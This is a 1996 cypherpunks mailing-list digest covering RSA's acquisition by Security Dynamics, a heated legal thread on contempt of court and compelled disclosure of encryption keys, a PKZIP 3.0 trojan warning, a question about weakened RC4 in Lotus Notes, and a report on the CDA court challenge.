>Cambridge MA and Redwood City, CA -- April 15, 1996 -- Security Dynamics Technologies, Inc. 
>(NASDAQ: SDTI) and RSA Data Security, Inc. today announced that they have signed a definitive 
>agreement for Security Dynamics to acquire RSA, a Redwood City, California vendor of encryption 
>software. The transaction is intended to be carried out by the merger of RSA and a wholly-owned 
>subsidiary of Security Dynamics in a tax-free transaction accounted for as a  pooling of 
>interests. For the year ended December 31, 1995, RSA had revenues and net income of 
>approximately $11,6000,000 and $950,000, respectively.


A 200-1 price/earnings ratio?!?  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Apr 1996 14:26:22 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What can the judge do to me?
In-Reply-To: <199604151721.KAA03490@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960415172347.1228D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, Hal wrote:

> From: Black Unicorn <unicorn@schloss.li>
> > I've been involved in a private discussion with a list reader about 
> > the extent to which courts can impose contempt fines and sanctions.  I 
> > thought I would post the results to the list as many have expressed 
> > interest in the ways that courts might try to compel production of 
> > crypto keys or compel offshore e-cash institutions.  The bulk of my 
> > answer follows.
> 
> I thought this was very interesting and I appreciate Unicorn taking the
> time to lend us his expertise.

Thanks for taking the time to tell me so.

> 
> > The key to limiting the ability of a court to summarily enter contempt 
> > sanctions has always been the classification of the sanctions.  
> > "Criminal" sanctions, may entitle the witness to a trial by jury.
> > [...]
> > "Civil" sanctions do 
> > not require such protections and can be imposed on the spot and 
> > without review.
> 
> I didn't understand what distinguishes civil and criminal sanctions.  Is
> it the nature of the proceedings, whether it is a civil or criminal case
> that is before the judge?  Or is it the nature of the contempt charge
> itself, where not doing what the judge wants, in broad terms, is civil
> contempt?  And in that case, what would be criminal contempt?

It's muddled.

The key seems to be the nature and purpose of the sanctions.  (And mostly 
the purpose).

As a very general rule of thumb (as these tend to be case by case 
analysis) when the sanctions are punative, intended to punish past 
conduct and not influence future conduct, contempt sanctions are 
"criminal" and require due process and other protections.

Where contempt sanctions are intended to effect compliance with court 
orders, or are the result of disruptive or destructive behavior that 
interferes with a court's proceedings (withholding testomony, outbursts 
or insulting behavior in the court, withholding evidence, refusal to 
appear), contempt sanctions are civil, and can be leveled on the spot 
without any protections or review.

> > The court makes a point to justify severe sanctions where testimony is 
> > sought, or the proceedings are threatened.  "The necessity 
> > justification for the contempt authority is at its pinnacle, of 
> > course, where contumacious conduct threatens a court's immediate 
> > ability to conduct its proceedings, such as where a witness refuses to 
> > testify, or a party disrupts the court... [t]hus, petty, direct 
> > contempts in the presence of the court traditionally have been subject 
> > to summary adjudication, 'to maintain order in the courtroom and the 
> > integrity of the trial process in the face of an 'actual obstruction 
> > of justice.'"  International Union, supra (quoting Codispoti v. 
> > Pennsylvania, 418 U.S., at 513 and citing numerous other sources).
> 
> Would there be a distinction between contempt by a witness and that by
> the defendant (in a criminal case)?  I could see justification for
> attempting to compel testimony from a witness who can shed needed light
> on guilt or innocence in the case.  A man's freedom or perhaps his very
> life is at stake.  But it seems to be another matter to compel the
> defendant himself to provide some information which will be detrimental
> to himself.

Historically, and in my experience, criminal defendants are given a lot 
more leeway.  No judge is going to push constitutional rights with 
contempt sanctions.  If, however, in the judge's view there are not 
constitutional rights which apply, defendant's are just as likely to get 
smacked.  (One example that comes to mind is where the defendant waived 
his Fifth Amendment rights, then refused to testify anyhow.  Prosecution 
objected and asked for contempt sanctions [for which there was a very 
good argument, the waiver was quite explicit and the prosecution had 
based a good deal of argument on it and defendant's existing 
testomony already.]  The judge refused to level contempt, prosecution 
appealed the decision immediately and we went all the way to oral 
argument before the appeals court upheld the judge's decision.  The 
appeals court judge cited specifically the importance of leeway in 
criminal cases and refused to find clear error).

> 
> The defendant has some Fifth Amendment rights, but for those cases
> where what he is ordered to do has been found not to be protected by
> the Fifth Amendment it still seems bizarre to imagine him jailed for
> contempt if he refuses.  Are there precedents for holding a defendant in
> contempt for standing mute at his own trial?
>

These are generally only after an explicit waiver of fifth amendement 
rights, or when they clearly, quite clearly, do not apply.  I'll dig up 
cites if there is enough interest.

> (Part of my problem with this scenario is my sense that despite gradual
> erosion of the rights against self incrimination, verbally revealing a
> pass phrase which will unlock an encrypted document seems like
> testimony, and something which should be protected.  Is there such a
> difference between "Reveal the pass phrase" and "Reveal what you did with
> the knife", if the judge doesn't believe the denials of the ability to
> comply?)

To trigger Fifth amendment rights, an act must be testimonial, and 
incriminating.  I discussed it a bit in my note on asset concealing.  
I've reproduced the passage below:

The cases following In re Grand Jury Proceedings, 814 F.2d 791 (1st
Cir. 1987) demonstrate how the fifth amendment has been eroded or
eliminated in application to this problem.  In the In re case the
defendant was directed by the district court to sign a consent form
permitting the disclosure and production by a financial institution of
documents protected by Singapore banking secrecy law.  On refusing to
sign, the defendant was held in contempt.  The investigation alleged
reporting and currency violations.  The defendant appealed to the
First Circuit which held the signature as both "testimonial" and
"self-incriminating."  The court reasoned that the consent form
"amounts to an assertion" that the bank customer consented to
production of the requested records and that it was "self-
incriminating" because it could be used to demonstrate incriminating
facts (e.g., that the accounts in the witness's name existed and were
within the witness's control).  Even at the time, however, this
decision was in conflict with the Second, Fifth and Eleventh circuits,
which have held such an order does not violate the fifth amendment.
(Typically on the grounds that the forms signed were non-testimonial).

Lately, clever prosecutors and private litigants have evaded the
testimonial hitch entirely by phrasing their consent forms in the
hypothetical, and not naming specific account names or numbers.  The
Supreme Court upheld the order of contempt for a defendant refusing to
sign such a document.  See, Doe v. United States, 108 S. Ct. 2341
(1988).  The Court noted that the form was carefully drafted not to
make reference to a specific account, but only to speak in the
hypothetical.

[...]

For more examples See also, United States v. Davis, 767 F.2d at 1040
(holding any problem of testimonial self-incrimination is solved by
such an order precluding use of directive as admission); In re Grand
Jury Proceedings, 814 F.2d at 795 (expressly approving of reasoning in
Davis); United States v. A Grand Jury Witness, 811 F.2d 114, 117 (2d
Cir. 1987); United States v. Cid-Molina, 767 F.2d 1131, 1132 (5th Cir
1985); United States v. Ghidoni, 732 F.2d 814, 818 (11th Cir.), cert.
denied, 469 U.S. 932 (1984); United States v. Browne, 624 F. Supp.
245, 248 (N.D.N.Y. 1985); United States v. Quigg, 48 A.F.T.R.2d 81-
5953, 5955 (D. Vt. 1981).

*end

If there is enough interest, I will do a small note on the distinctions 
that have been important to courts in compelling production of 
potentially incriminating evidence.

> > Most interesting to the crypto crowd:
> > 
> > "Contempts such as failure to comply with document discovery, for 
> > example, while occurring outside the court's presence, impede the 
> > court's ability to adjudicate the proceedings before it and thus touch 
> > upon the core justification for the contempt power....  Similarly, 
> > indirect contempts involving discrete, readily ascertainable acts, 
> > _such as turning over a key_ or payment of a judgment, properly may be 
> > adjudicated through civil proceedings since the need for extensive, 
> > impartial fact-finding is less pressing."  International Union, supra 
> > (emphasis added).
> 
> I would guess that "turning over a key" here refers not to production to
> the court by rather to passing a physical key between two contesting
> parties, say a seller and buyer of some property that the key gives
> access to.  The phrase "turning over" rather than "production of" suggests
> this interpretation.  So this sounds like something which would be more
> likely to occur in a civil proceeding than a criminal one.

I have seen a court compell the production of safety deposit box keys in a
criminal case when those boxes were suspected to hold the fruits of a 
crime and the court had acknowledged the defendant's possesion of the 
key, and ownership of the box as well as the potential incriminating 
nature of the boxes contents.  A per day fine was imposed.  If you want 
specifics I'll attempt to get a waiver from the client and pass them on.

> Hal


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 16 Apr 1996 16:50:22 +0800
To: Ramli Bin Jaafar <wolv@infosys.utm.my>
Subject: Re: Trojan Horse Loose On The Internet
In-Reply-To: <19960415073947953.AAA74@Executioner.utm.my>
Message-ID: <Pine.3.89.9604151845.A4741-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain



Yes, the PKZIP 3.0 virus does exist, but it is a trojan, not a virus. You 
have to run the program - then it does a dance on your disk with less 
than pleasurable results. The latest official version of PKZIP I know of is 
2.04g. Any other version greater than this should be suspect.

...Paul

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------

On Mon, 15 Apr 1996, Ramli Bin Jaafar wrote:

> According to several reliable sources there is a deadly virus on the
> Internet.  This is NOT a hoax! 
> CAN ANYBODY CHECK THIS OUT, PLEASE..
> 
> Note: The reliability of all information below is UNKNOWN.
>      
> WHAT:
> Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet
>     
> BACKGROUND:
> A trojan (virus) program, PKZIP 3.0, which is advertised as an updated
> version of the popular compression utility PKZIP, is currently being
> distributed on the Internet.  Please note that this trojan is REAL and
> DESTRUCTIVE.  Once executed, this program will destroy data on your hard
> drive; there's no stopping it.
> 
> According to PKWARE, makers of PKZIP, the only released versions of PKZIP
> are:  1.10, 1.93, 2.04c, 2.04e and 2.04g.  All other versions currently
> circulating on the Internet are suspect and should not be used.
> 
> ACTION REQUIRED:
> Please do not download or execute any files that are named PKZ300B.EXE,
> PKZ300B.ZIP, PKZIP300.ZIP, PKZIP300.EXE, etc. from the Internet or other
> external source.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Apr 1996 15:04:05 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What can the judge do to me?
Message-ID: <m0u90Yb-00090RC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:51 PM 4/15/96 -0400, Black Unicorn wrote:
>On Mon, 15 Apr 1996, jim bell wrote:
>
>> At 10:21 AM 4/15/96 -0700, Hal wrote:
>> >From: Black Unicorn <unicorn@schloss.li>
>
>[...]
>
>> >I didn't understand what distinguishes civil and criminal sanctions.  Is
>> >it the nature of the proceedings, whether it is a civil or criminal case
>> >that is before the judge?  Or is it the nature of the contempt charge
>> >itself, where not doing what the judge wants, in broad terms, is civil
>> >contempt?  And in that case, what would be criminal contempt?
>> 
>> He may answer those questions, but I don't think he'll dare answer the 
>> question about if there is a constituional justification for a difference 
>> between "civil" and "criminal" in most things the government's courts do.
>
>Mr. Bell amuses me because he can never decide if he's a constitutional 
>formalist, as above (all things the government does must be explicitly 
>justified in the constitution) or a pragmatist,

Above, I merely asked a question that you still can't answer.  The fact that 
courts claim that there is a difference between "civil" and "criminal" does 
not mean that any such difference is constitutionally mandated, or for that 
matter even allowed.  Nothing in your response showed otherwise.


>(a) A criminal contempt fine is punitive and can be imposed only through
>criminal proceedings, including the right to jury trial. 

Does that mean that it would have been constitutionally impermissible to 
take the different position that ALL fines are ultimately "punitive"?  That 
position is apparently not _excluded_ by the constituion, which means that 
at best, you might try to argue that your position is _allowed_ by the 
constitution.  But since the Constitution is, indeed, the statement of the 
government's authority, not its limits, that would be a contradiction.  

The obvious conclusion is that your sentence above is simply unsupported by 
the Constitution, as are many of your statements below.  I'm not claiming 
that you are, necessarily, the source of the contradiction:  Obviously, most 
of it is simply governmental misbehavior that you are reporting.

>A contempt fine is

>considered civil and remedial if it either coerces a defendant into 
>compliance with a court order 

You do love those circular arguments, don't you!  Maybe it's pointless to 
ask you why anybody has to "comply with a court order."   I've already asked 
this before:  What, in the Constitution, gives judges authority over 
non-defendant citizens?

>(b) Most contempt sanctions share punitive and coercive characteristics, and
>the fundamental question underlying the distinction between civil and
>criminal contempts is what process is due for the imposition of any 
>particular contempt sanction.  Direct contempts can be penalized summarily 
>in light of the court's substantial interest in maintaining order and 
>because the need for extensive factfinding and the likelihood of an 
>erroneous deprivation are reduced.  Greater procedural protections are 
>afforded for sanctions of indirect contempts.  Certain indirect contempts 
>are particularly appropriate for imposition through civil proceedings, 
>including contempts impeding the court's ability to adjudicate the 
>proceedings before it and those contempts involving discrete, readily 
>ascertainable acts.  For contempts of more complex injunctions,
>however, criminal procedures may be required. Id.

A paragraph which is delightfully free of constitutional justification.  It 
apparently merely parrots the decisions of courts, it doesn't explain them.  
Typical Unicorn behavior.

>Because civil contempt sanctions are viewed as nonpunitive and avoidable, 
>fewer procedural protections for such sanctions have been required.

Hmmm...  I wonder why? I mean, would it have been impossible for the SC to 
have declared that regardless of those assertions, ALL such sanctions 
require those "procedural protections."  Unicorn has no answer, as usual.
Hint:  If the position you support is true, then you should be able to show 
me evidence that no other alternative position is consistent with the 
Constitution.   As long as you cannot show that one PARTICULAR 
interpretation is uniquely supported,  you haven't supported this particular 
claim. 

>To the extent that such contempts take on a punitive character, however, 
>and are not justified by other considerations central to the contempt 
>power, criminal procedural protections may be in order.  International Union.

No constitutional justification, again.  Ho hum.


>The justification for the contempt charges are on the 
>proper administration of justice, to which every citizen is entitled. 

Unicorn fails to show that "Proper administration of justice" requires 
contempt charges.  And the most obvious problem with the "to which every 
citizen is entitled" argument is that it is vastly overbroad:  If it could 
be used in this instance, it could be used to justify beating confessions 
out of prisoners, shooting unarmed suspects, and practically every other act 
that somebody claimed was necessary for "the proper administration of justice."

After all, consider how "justice" was administered 300 years ago.  I'm sure 
those people did a lot of things, based on a claim that it was necessary for 
"the proper administration of justice."  Was it really?

What, BTW, is "proper"?
 
>While I'm sure Mr. Bell would like it if he could just flip off a court, 
>as with most self centered types, I don't think he has considered the 
>ramifications of this kind of impunity in the aggregatre.

Is that a satisfactory justication for your position?

>
>Mr. Bell claims this is a new tyrranical development.  Mr. Bell is incorrect.

Where, EXACTLY, did I claim that it was a "new" development?  I've carefully 
re-read my statements, and I see nothing that states or even implies this.  
Continuing to knock down that straw man, huh?


>Ex parte Robinson, 86 U.S. 505, 19 Wall. 505, 510, 22 L. Ed. 205 (1874) 
>(contempt authority is vital to the administration of justice).
>(122 years ago).

In 1860, slavery was considered vital to the running of much of the US.  So?

[a couple other old decisions excised because they are irrelevant, and they 
are irrelevant because I didn't claim this was a "new" development."]

>One might also remember where the term "pressing the defendant for a 
>plea" originated.  Contempt sanctions are nearly 500-600 years old and 
>are a response to the need to effect compliance with orders and summons.

Which simply means that what a court thinks it "needs" is frequently wrong.  
If courts "needed" pressing, why do they no longer do it?  Hmmmmm?  
Apparently, it wasn't really necessary, and thus, any justifications based 
on the claim that it was necessary were dishonest.  As are your 
justifications today, on a somewhat different issue.

I've long pointed out that your own arguments self-destruct, and perhaps 
that was the most laughable example.

>> We also won't get a straight answer about the constitutional justification 
>> for "contempt of court" penalties at all!  The Constitution defines the 
>> powers of government; it does not restrict those of the people.
>
>I suppose you don't think anyone need serve on juries? 

Generally in a non-slavery society, if you want people to do something for 
you, you hire them at a wage they will accept, and they'll happily do what 
you want.  It's called "capitalism."  Too bad courts still believe in slavery.

>Or appear before a court when summoned? 

Tell me, if _I_ "summon" somebody, do they have to show as well?  If not, 
why should a "court" have any such authority.

> Or testify if its inconvenient? 

If it's testimony in favor of the prosecution, and I don't want to give that 
testimony, I see no constitutional justification for forcing me to do so.

You'll probably try to claim that this testimony is "necessary."  Let's 
suppose I was out of the country and was unavailable for 
subpoena.  The trial would go on, anyway, so obviously my testimony was not 
"necessary" by any logical definition.  It was merely desirable, by 
somebody's opinion.  Sure, the prosecution may lose the case, but the 
prosecution doesn't have a "right" to win the trial, now does it?  At best, 
it only has the "right" (arguably; but even that "right" is conditional) to 
have a trial.  The outcome is not guaranteed!


>> The idea 
>> that a judge can punish someone, especially someone not present in court, 
is 
>> bizarre.  It is even more odd when such punishment appears to exceed what 
>> the government is allowed to do absent any kind of jury decision and 
>> conviction.
>
>Huh?  Ever hear of late filing fees?  Administrative fines?  Taxes? 

I said it was "bizarre."  I did not say it was "uncommon."

BTW, note that "late filing fees" assumes that somebody is obligated to file 
something, and likewise "Administrative fines" assumes that somebody is 
entitled to levy them, etc.  We won't get into taxes, that would take FAR 
too long.

> How 
>many examples do you want where government can impose costs on persons 
>without a fully jury trial?  Even contracts are in the end enforced by 
>government in the United States.

But they apparently don't have to be.  Arbitration is an option.

 
>> If you're willing to accept NON-Constitutional "justifications," I'm sure 
>> you'll get plenty of that.
>> 
>> The only hint of a Constitutional obligation to testify comes from an 
>> amendment which states that defendants have a right to compel testimony 
>> favorable to them; it does not say that prosecution has the right to compel 
>> testimony from a third party that incriminates a defendant.
>
>Look, Mr. Bell.  I don't know where you get this stuff,

I notice that you failed to address the point.  You're unable to find any 
Constitutional justification for compelling prosecution testimony.  There is 
no constitutionally-defined mechanism for it, either.   That's because none 
exists.


> but you really 
>need to take a few classes in jurisprudence. 

I am well aware of the misbehavior of government.  The issue is 
constitutional justifications for it.  They seem to be, well, practically 
nonexistent.

> You need to learn what life 
>would really be like if the strict reading of the constitutional you urge 
5>was followed, and you need to transcend your political Yaddaing into a set 
>of criteria which resemble something like earthbound possibilities.

I'm working on it.  But you won't like the outcome; there will be no 
"kings", either stated or implied, in the system I am crafting.  No 
centralizations of power at all.  It will be a system you can't understand.

>
>> If his 
>> response is, "Oh, but we've ALWAYS done it that way!", you need to remember 
>> that until the American Civil war, slavery was legal in southern states, 
and 
>> until 1920 women weren't allowed to vote, and until 1955 "separate but 
>> equal" was the law of the land, until 1972 or so the death penalty was 
>> constitutional...and then it wasn't...and then it was again...and so on.  
>> Government is never willing to admit it's wrong until it's good and ready.
>
>By 'wrong' you mean doesn't agree with you.  I'm sure precident and it's 
>rationale means little to you.

That's spelled "precedent."  But why am I telling you this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Apr 1996 13:12:55 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: What can the judge do to me?
In-Reply-To: <m0u8wb7-0008zLC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960415190758.342B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, jim bell wrote:

> At 10:21 AM 4/15/96 -0700, Hal wrote:
> >From: Black Unicorn <unicorn@schloss.li>

[...]

> >I didn't understand what distinguishes civil and criminal sanctions.  Is
> >it the nature of the proceedings, whether it is a civil or criminal case
> >that is before the judge?  Or is it the nature of the contempt charge
> >itself, where not doing what the judge wants, in broad terms, is civil
> >contempt?  And in that case, what would be criminal contempt?
> 
> He may answer those questions, but I don't think he'll dare answer the 
> question about if there is a constituional justification for a difference 
> between "civil" and "criminal" in most things the government's courts do.

Mr. Bell amuses me because he can never decide if he's a constitutional 
formalist, as above (all things the government does must be explicitly 
justified in the constitution) or a pragmatist, as when he is defending 
his murderous proposals (we can ignore the due process clause of the 
constitution and order assassinations anonymously because due process 
rights are vaguely defined in the constitution and we should look to the 
concepts of other nations in quashing the U.S. version).

> My impression is that the "civil" classification is often simply used to 
> dilute or eliminate the various constitutional protections that the 
> government hasn't yet dared to remove from areas it calls "criminal."

I will discuss the rationale the courts use in making the distinction, and 
discuss the constitutional issues briefly, as I did before.  Mr. Bell 
will, as always, impute some express or implied approval of some policy 
that appears nowhere in my writings.


(a) A criminal contempt fine is punitive and can be imposed only through
criminal proceedings, including the right to jury trial. A contempt fine is
considered civil and remedial if it either coerces a defendant into 
compliance with a court order or compensates the complainant for losses 
sustained. United States v. United Mine Workers of America, 330 U.S. 258, 
303-304, 91 L. Ed. 884, 67 S. Ct. 677. Where a fine is not compensatory, 
it is civil only if the contemnor has an opportunity to purge, such as 
with per diem fines and fixed, suspended fines.  Id.

(b) Most contempt sanctions share punitive and coercive characteristics, and
the fundamental question underlying the distinction between civil and
criminal contempts is what process is due for the imposition of any 
particular contempt sanction.  Direct contempts can be penalized summarily 
in light of the court's substantial interest in maintaining order and 
because the need for extensive factfinding and the likelihood of an 
erroneous deprivation are reduced.  Greater procedural protections are 
afforded for sanctions of indirect contempts.  Certain indirect contempts 
are particularly appropriate for imposition through civil proceedings, 
including contempts impeding the court's ability to adjudicate the 
proceedings before it and those contempts involving discrete, readily 
ascertainable acts.  For contempts of more complex injunctions,
however, criminal procedures may be required. Id.

Because civil contempt sanctions are viewed as nonpunitive and avoidable, 
fewer procedural protections for such sanctions have been required.
To the extent that such contempts take on a punitive character, however, 
and are not justified by other considerations central to the contempt 
power, criminal procedural protections may be in order.  International Union.

The justification for the contempt charges are on the 
proper administration of justice, to which every citizen is entitled.  
While I'm sure Mr. Bell would like it if he could just flip off a court, 
as with most self centered types, I don't think he has considered the 
ramifications of this kind of impunity in the aggregatre.

Mr. Bell claims this is a new tyrranical development.  Mr. Bell is incorrect.

Consider:

In re Nevitt, 117 Fed. 451 (1902) (upholding the contempt power of courts).
(94 years ago).

Ex parte Robinson, 86 U.S. 505, 19 Wall. 505, 510, 22 L. Ed. 205 (1874) 
(contempt authority is vital to the administration of justice).
(122 years ago).

Courts must be "vested with the power to impose silence, respect, and 
decorum, in their presence, and submission to their lawful mandates, and 
. . . to preserve themselves and their officers from the approach and 
insults of pollution." Anderson v. Dunn, 19 U.S. 204, 6 Wheat. 204, 227, 5
L. Ed. 242 (1821).
(175 years ago).

The contempt power is a power "necessary to the exercise of all
others." United States v. Hudson, 11 U.S. 32, 7 Cranch 32, 34, 3 L. Ed. 259
(1812).
(184 years ago).

One might also remember where the term "pressing the defendant for a 
plea" originated.  Contempt sanctions are nearly 500-600 years old and 
are a response to the need to effect compliance with orders and summons.

> Too bad we won't get a straight answer...

You mean an answer that argues semantics and devolves into your Yadda 
Yadda Yadda stuff.

> We also won't get a straight answer about the constitutional justification 
> for "contempt of court" penalties at all!  The Constitution defines the 
> powers of government; it does not restrict those of the people.

I suppose you don't think anyone need serve on juries?  Or appear before 
a court when summoned?  Or testify if its inconvenient?  Your absoluteism 
betrays a grave ignorance and sheltered view of the world.

> The idea 
> that a judge can punish someone, especially someone not present in court, is 
> bizarre.  It is even more odd when such punishment appears to exceed what 
> the government is allowed to do absent any kind of jury decision and 
> conviction.

Huh?  Ever hear of late filing fees?  Administrative fines?  Taxes?  How 
many examples do you want where government can impose costs on persons 
without a fully jury trial?  Even contracts are in the end enforced by 
government in the United States.
 
> If you're willing to accept NON-Constitutional "justifications," I'm sure 
> you'll get plenty of that.
> 
> The only hint of a Constitutional obligation to testify comes from an 
> amendment which states that defendants have a right to compel testimony 
> favorable to them; it does not say that prosecution has the right to compel 
> testimony from a third party that incriminates a defendant.

Look, Mr. Bell.  I don't know where you get this stuff, but you really 
need to take a few classes in jurisprudence.  You need to learn what life 
would really be like if the strict reading of the constitutional you urge 
was followed, and you need to transcend your political Yaddaing into a set 
of criteria which resemble something like earthbound possibilities.

> If his 
> response is, "Oh, but we've ALWAYS done it that way!", you need to remember 
> that until the American Civil war, slavery was legal in southern states, and 
> until 1920 women weren't allowed to vote, and until 1955 "separate but 
> equal" was the law of the land, until 1972 or so the death penalty was 
> constitutional...and then it wasn't...and then it was again...and so on.  
> Government is never willing to admit it's wrong until it's good and ready.

By 'wrong' you mean doesn't agree with you.  I'm sure precident and it's 
rationale means little to you.

> That doesn't mean we can't express our own opinions "prematurely."

Opinions are like rectums....

> I'd sure like to hear the "why" behind this stuff, but I won't...  Sigh.

Apply to law school.  The questions you are struggling with will be 
answered in your first year readings.  I'm hardly going to type in all of 
Ernst on property or Goldman on constitutional law for your benefit.  
Time to start doing your own homework.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omaha Remailer <nsa@omaha.com><x@x.x>
Date: Tue, 16 Apr 1996 14:27:39 +0800
To: perry@piermont.com.cypherpunks@toad.com
Subject: Re: Lotus notes 24 bit hack project?
Message-ID: <199604160135.UAA05462@glucose.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Revealing what? Its not like there is a mystery, Mr. Detweiler.

Well, for one it might be nice to reveal how much easier it is to
crack 64-bit RC4 given 24 of the bits than it is to crack straight
RC4.  (If it is easier.)  Just a thought.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 16 Apr 1996 13:43:12 +0800
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Trojan Horse Loose On The Internet
In-Reply-To: <doug-9603151349.AA0273400@netman.eng.auburn.edu>
Message-ID: <Pine.BSF.3.91.960415202856.1893A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


This one has been around for ages, but the story seems to be making the 
rounds once again.

See PKWARE's web site:

http://www.pkware.com/fake.html

(posted May, 1995)

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------





On Mon, 15 Apr 1996, Doug Hughes wrote:

> 
> >
> >According to several reliable sources there is a deadly virus on the
> >Internet.  This is NOT a hoax! 
> >CAN ANYBODY CHECK THIS OUT, PLEASE..
> >
> >Note: The reliability of all information below is UNKNOWN.
> >     
> >WHAT:
> >Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet
> >    
> >BACKGROUND:
> >A trojan (virus) program, PKZIP 3.0, which is advertised as an updated
> >version of the popular compression utility PKZIP, is currently being
> >distributed on the Internet.  Please note that this trojan is REAL and
> >DESTRUCTIVE.  Once executed, this program will destroy data on your hard
> >drive; there's no stopping it.
> >
> >According to PKWARE, makers of PKZIP, the only released versions of PKZIP
> >are:  1.10, 1.93, 2.04c, 2.04e and 2.04g.  All other versions currently
> >circulating on the Internet are suspect and should not be used.
> >
> >ACTION REQUIRED:
> >Please do not download or execute any files that are named PKZ300B.EXE,
> >PKZ300B.ZIP, PKZIP300.ZIP, PKZIP300.EXE, etc. from the Internet or other
> >external source.
> >
> >Anybody with any information on this..??
> 
> 100% true and verifiable. Although I wouldn't call it deadly or rampant, 
> it has been making the rounds of late. Mostly it's victims are new users.
> After all, how many times have you upgraded your copy of pkzip? ;)
> 
> --
> ____________________________________________________________________________
> Doug Hughes					Engineering Network Services
> System/Net Admin  				Auburn University
> 			doug@eng.auburn.edu
> 		Pro is to Con as progress is to congress
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 16 Apr 1996 18:20:41 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #7 (Ducks on the Net)
Message-ID: <MlQivta00YUuQxjmpq@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                        The CDA Challenge, Update #7
-----------------------------------------------------------------------------
     By Declan McCullagh / declan@well.com / Courtesy of The Netly News
-----------------------------------------------------------------------------
   From the Netly News at <http://pathfinder.com/Netly/daily/nnhome.html>:

   We've become fans of Declan McCullagh's dispatches from Philadelphia
   where a three-judge panel is determining the fate of the so-called
   Communications Decency Act. McCullagh, as you probably know, is an
   activist with the EFF whose free-speech stance mirrors our own.
   We'd be happy to run an opposing viewpoint, but we don't know anyone
   who's actually pro-CDA. Still, if you are and would like to use this
   bully pulpit to pitch your ideas to an extremely hostile audience,
   drop us a line. In the meantime, here's a piece we asked McCullagh to
   do for us as the hearing winds down.
-----------------------------------------------------------------------------

In this update: Ducks on the Net!
                More on BYU's Dan Olsen's censorhappy boondoggle
                Grey Flannel Suit wears Blue Pinstripe, surfs for porn


April 15, 1996

PHILADELPHIA -- Ducks were a hit at the most recent Communications
Decency Act hearing in Philadelphia's Federal court.

Yes, ducks.

Last Friday the Department of Justice's cybersleaze expert took the
stand to show how easily children can stumble across online porn --
but the three-judge panel limited his demonstration to G-rated GIFs
that he sucked down from alt.binaries.pictures.animals. (The judges
already had hundreds of pages of dirty downloads in large black
binders, courtesy of the Feds.)

After the second or third image of waterfowl cartoons, Judge Stewart
Dalzell said: "I'm sure we can agree that this is a cute duck." U.S.
Third Circuit Court of Appeals Chief Judge Dolores Sloviter ruled: "I
think we've seen enough of the ducks."

Justice Department attorneys had reserved the day to defend the
constitutionality of the CDA, arguing that the criminal provisions of
the law and a system to label sexually-explicit materials combine to
form the best way to prevent children from stumbling across cyberporn.

Key to the DoJ strategy was the testimony of Dan Olsen, Jr., their pet
censorhappy toady from Brigham Young University who testified that to
comply with the CDA, everyone who uses "indecent" speech should label
it as "-L18," meaning unsuitable for those less than 18 years old.

An intense cross examination by the ALA/CIEC's Bruce Ennis forced the
BYU computer scientist to admit that his proposal has fatal problems:

  * Web browsers, IRC clients, newsreaders, and even the telnet
    application must be rewritten to recognize the "-L18" string.

  * Everyone who posts or publishes "indecent" materials must comply,
    including folks overseas.

  * "-L18" relies on the poster or publisher to decide what is
    "decent" or not -- unlike PICS, which our witness testified allows
    third parties to rate content, including non-U.S. material.

On the fight-censorship mailing list, online activist Carl Kadie
has pointed out why Olsen's plan is unconstitutional:

  1. "The Government generally can not compel speech (including self-labels)"
  2. "It would restrict 17-year olds to material suitable for 5-year olds."

Given the braindead nature of Olsen's scheme, it's not surprising that
he has no expertise in protocol design or distributed computing
environments like the Internet. He also admitted during
cross-examination that he invented the "-L18" boondoggle in the last
two weeks and was unaware that similar proposals like "KidCode"
already exist.

An odd mix of prudish themes and Orwellian overtones laced his
testimony. Olsen, the incoming director of the Human Computer
Interaction Institute at Carnegie Mellon University, testified that he
